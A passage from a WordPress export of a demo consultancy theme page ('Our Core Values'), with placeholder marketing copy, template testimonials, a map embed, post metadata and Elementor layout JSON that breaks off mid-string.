										<img width="750" height="660" src="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image2-home1-300x264.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Vision</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				Exceptional Client Service 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Great Team and Winning Culture 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Commitment to Integrity, Fairness 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>529</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-core-values]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[531]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"db1842d","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"84cfb4a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"de37b10","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2519f8f","elType":"column","settings":{"_column_size":50,"_inline_size":42},"elements":[{"id":"10ad2ad","elType":"widget","settings":{"sub":"what we offer","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"5aeaeb4","elType":"column","settings":{"_column_size":50,"_inline_size":58},"elements":[{"id":"3148f6f","elType":"widget","settings":{"editor":"<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"87d4f34","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"b70b980","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"73c0a87","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"bc54eaf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2e00231","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"36da7a0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a72089a","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"4c9f589","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#F5F5F5","padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"23a042a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b29ab89","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"0e7cc6c","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"3eaebc8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"a146db1","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7c66c5a","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"8a93a84","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7f8aa51","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"076fd4b","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-value.jpg","id":540},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"87682dc","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"cf617aa","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"73","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"695bdb3","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"90b64c6","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"eb959a2","elType":"widget","settings":{"sub":"the language of business","title":"Consultancy That Empowers You","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"df732f4","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c95075f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"512e7f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0b4ba37","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"20a92cd","elType":"widget","settings":{"title_boxes":[{"_id":"228c623","titles":"our philosophy","title_link":"#our-philo"},{"_id":"71b96ee","titles":"our mission","title_link":"#our-mission"},{"titles":"our vision","title_link":"#our-vision","_id":"02bca8a"}],"radius_title":{"unit":"px","top":"3","right":"3","bottom":"0","left":"0","isLinked":false},"title_bg":"#FFFFFF33","title_active_color":"#1B1D21","title_active_bg":"#FFFFFF"},"elements":[],"widgetType":"itabtitle"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25cec1f","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-philo","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"69079ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e1703a9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-value.jpg","id":542},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"c7f2f31","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"797598f","elType":"widget","settings":{"title":"Our Philosophy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"06391c3","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ae1ab95","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#FF8F3E","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"6444584","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#FF8F3E","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"45d2a82","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"3076906","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-mission","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"d0c38ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"0a21f5d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/our-vision.jpg","id":1029},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"4554b13","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"ebcd194","elType":"widget","settings":{"title":"Our Mission","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0ef6c14","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6614930","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#FF8F3E","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"61f0b81","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#FF8F3E","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"ed79a7d","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dd17773","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-vision","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"49ce3f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"fc1c0ad","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home1.jpg","id":1026},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"cd3eacf","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"42d9c0e","elType":"widget","settings":{"title":"Our Vision","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2922134","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7bdb59","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#FF8F3E","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"d35150b","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#FF8F3E","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"9c23cfd","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"0f844d1","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-value.jpg","id":549},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"105","left":"0","isLinked":false},"content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fc8acf7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"f8ca7a4","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"82ac6eb","elType":"widget","settings":{"ot_accs":[{"acc_title":"Exceptional Client Service","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"74a73c1"},{"acc_title":"A Great Team and Winning Culture","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"a8df8eb"},{"acc_title":"A Commitment to Integrity, Fairness","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"dc09f20"}],"bg_title":"#A7A7A733","title_color":"#FFFFFF","bg_content":"#9C3D3D00","title_border":"#FFFFFF33","content_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]},"content_typography_typography":"custom","content_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"21dc41a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e7a0c01","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values.png","id":555},"image_size":"full","align_tablet":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"aebe74e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg3-value.jpg","id":558},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"c4c8174","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e7309f3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"afeb8de","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"18aa73e","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"fd1dd49","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"cb7d5c6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"6734af5","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"31d8a18","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"284c1cf","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"38f0ecc","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees 